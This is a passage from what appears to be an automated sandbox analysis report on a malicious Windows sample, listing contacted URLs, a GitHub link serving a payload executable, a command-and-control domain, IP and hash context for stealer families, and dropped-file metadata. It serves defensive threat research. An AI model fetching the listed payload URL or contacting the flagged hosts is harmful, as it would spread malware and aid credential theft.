https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/apQ$	pdf.exe, 00000007.00000003.2052878859.00000000008B8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://seallysl.site/	pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927002716.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927112545.00000000008B6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://github.com	file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://seallysl.site/api$	pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/t	pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.mozilla.org/products/firefoxgro.all	pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	file.exe, 00000000.00000002.4141670945.0000000002301000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1752259690.0000000004ED1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.00000000048E1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/qt	pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1759697438.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/0t	pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://raw.githubusercontent.comd	file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.1733532963.000000000594C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.microsoft.	powershell.exe, 00000004.00000002.1735434885.0000000006F42000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://github.comd	file.exe, 00000000.00000002.4141670945.0000000002386000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.micro	powershell.exe, 00000004.00000002.1737431201.0000000007E93000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://raw.githubusercontent.com	file.exe, 00000000.00000002.4141670945.00000000023A8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://seallysl.site/apif	pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://support.microsof	pdf.exe, 00000007.00000003.1927351008.0000000003880000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.1752259690.0000000005025000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1730880127.0000000004A36000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0?	pdf.exe, 00000007.00000003.2004978035.0000000003860000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://raw.githubusercontent.com	file.exe, 00000000.00000002.4141670945.00000000023C1000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.enigmaprotector.com/	pdf.exe, 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe#C:	file.exe	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.199.109.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
172.67.180.76	seallysl.site	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544948
Start date and time:	2024-10-29 22:03:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/11@4/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 60% Number of executed functions: 101 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7300 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7540 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
17:04:03	API Interceptor	19x Sleep call for process: powershell.exe modified
17:04:13	API Interceptor	11493109x Sleep call for process: file.exe modified
17:04:21	API Interceptor	9x Sleep call for process: pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.199.109.133	cr_asm3.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	gabe.ps1	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	5UIy3bo46y.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	HQsitBLlOv.dll	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	OSLdZanXNc.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	steamcodegenerator.exe	Get hash	malicious	Unknown	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
	SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll	Get hash	malicious	Metasploit	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
	SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll	Get hash	malicious	AsyncRAT, XWorm	Browse	raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
140.82.121.4	RfORrHIRNe.doc	Get hash	malicious	Unknown	Browse	github.com/ssbb36/stv/raw/main/5.mp3
172.67.180.76	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse
	http://whatsmyname.app/	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	https://filerit.com/pi-240924.ps1	Get hash	malicious	Unknown	Browse	185.199.111.133
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	General Agreement.docx.exe	Get hash	malicious	Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber	Browse	185.199.111.133
	VM2ICvV5qQ.pdf	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	seethebestthingsformygirlshegreatfornewways.hta	Get hash	malicious	Cobalt Strike	Browse	185.199.111.133
	verynicegirlneedsuperkiisingfromtheboy.hta	Get hash	malicious	Cobalt Strike	Browse	185.199.108.133
	MlGBT3hUEG.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
github.com	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	140.82.121.3
	SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	General Agreement.docx.exe	Get hash	malicious	Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber	Browse	140.82.121.3
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	140.82.121.3
	YPcqnc0z06.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
seallysl.site	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
seallysl.site	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	172.67.180.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FASTLYUS	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	151.101.129.229
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	151.101.2.137
	https://dartergary.wordpress.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.2.92
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3Jn	Get hash	malicious	Unknown	Browse	151.101.129.140
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
CLOUDFLARENETUS	https://frs1sctxxr.shop/1stSource	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	188.114.96.3
	https://www.directo.com.bo/dok	Get hash	malicious	Unknown	Browse	104.17.25.14
	1Ebp0gOgh5.exe	Get hash	malicious	LummaC	Browse	172.67.135.58
	ORDER 2024-10-28-3537-121.exe	Get hash	malicious	FormBook	Browse	172.67.179.12
	EVER ABILITY V66 PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MV. NORDRHONE VSL's PARTICULARS.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	belks.spc.elf	Get hash	malicious	Mirai	Browse	1.2.57.113
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	188.114.96.3
GITHUBUS	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWorm	Browse	140.82.121.3
	SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	General Agreement.docx.exe	Get hash	malicious	Python Stealer, Babadeda, Exela Stealer, Waltuhium Grabber	Browse	140.82.121.3
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	LYDI9MoZyu.js	Get hash	malicious	STRRAT	Browse	140.82.121.4
	YPcqnc0z06.js	Get hash	malicious	STRRAT	Browse	140.82.121.4

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	EVER ABILITY V66 PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.109.133 140.82.121.4
	MV. NORDRHONE VSL's PARTICULARS.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.109.133 140.82.121.4
	MUM - VESSEL'S PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.109.133 140.82.121.4
	https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r=	Get hash	malicious	ScreenConnect Tool	Browse	185.199.109.133 140.82.121.4
	FW Complete with Docusign Remittance Advice .pdf.eml	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.4
	https://gthr.uk/e8c3	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.4
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.199.109.133 140.82.121.4
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.199.109.133 140.82.121.4
	https://deedayoshayoatmetoback.me/whatever/toni/kross/hala/mbappe/sanchez/mark/tremble/awee/rgguuu/us/invite/	Get hash	malicious	Unknown	Browse	185.199.109.133 140.82.121.4
	Jmaman_##Salary##_Benefit_for_JmamanID#IyNURVhUTlVNUkFORE9NMTAjIw==.html	Get hash	malicious	HTMLPhisher	Browse	185.199.109.133 140.82.121.4
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.180.76
	1Ebp0gOgh5.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	172.67.180.76
	NUEVA ORDEN DE COMPRA 73244.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.180.76
	burlar al diablo napoleon hill pdf.exe	Get hash	malicious	Unknown	Browse	172.67.180.76
	burlar al diablo napoleon hill pdf.exe	Get hash	malicious	Unknown	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76
	file.exe	Get hash	malicious	LummaC	Browse	172.67.180.76

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1290240
Entropy (8bit):	7.990450651344029
Encrypted:	true
SSDEEP:	24576:VUt6SS6/lwChL5nLexP9eVKN3RjJMDnhY3YnBypzcnNftDquJN:+t6fYFexPoKNfMbcYnEINVG8
MD5:	21EB0B29554B832D677CEA9E8A59B999
SHA1:	E6775EF09ACC67F90E07205788A4165CBF8496CA
SHA-256:	9AAA862061C903F3F5A1D509F0016A599B9152D02EA0365DFD3BBD9C5C147656
SHA-512:	E7434E0D46E37E4A76BD8E394063A3AC531892B972347B3DE8AA71689DED1CE4968B1A1DEFDA720AF4CFA66037390CBE771105E7BF892EF640CBEE12E862E742
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 59%
Reputation:	low
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g.................D........................@..........................0<...........@................................. .-...............................-..............................................................................................P.......2..................@............0...`.......6..............@....................4...F..............@............P.......$...z..............@.............'.........................@....data....`....-..X...X..............@...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.38114372208162
Encrypted:	false
SSDEEP:	48:EWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//8PUyus:ELHyIFKL3IZ2KRH9Oug8s
MD5:	1B9309745CFFAD26BCD7E43F75252B83
SHA1:	9531848BF7E4A57D86CDF7DC3D941F20F76273C5
SHA-256:	816AE5DF45B4D7E26DF5306F7B35D81A0CEB70ABEDD9A68FD377A50054018F0E
SHA-512:	FEB7306A764D0411B57B5149E87D456672EA0F41DF20A6A1EF567B5CE30A827EBE173965B9B7470A789B2D548B3E17B6B0136757651CC3EE167B0D752434137B
Malicious:	false
Reputation:	low
Preview:	@...e.................................4.............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eedb0q4n.0qa.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhjbkeew.l3p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
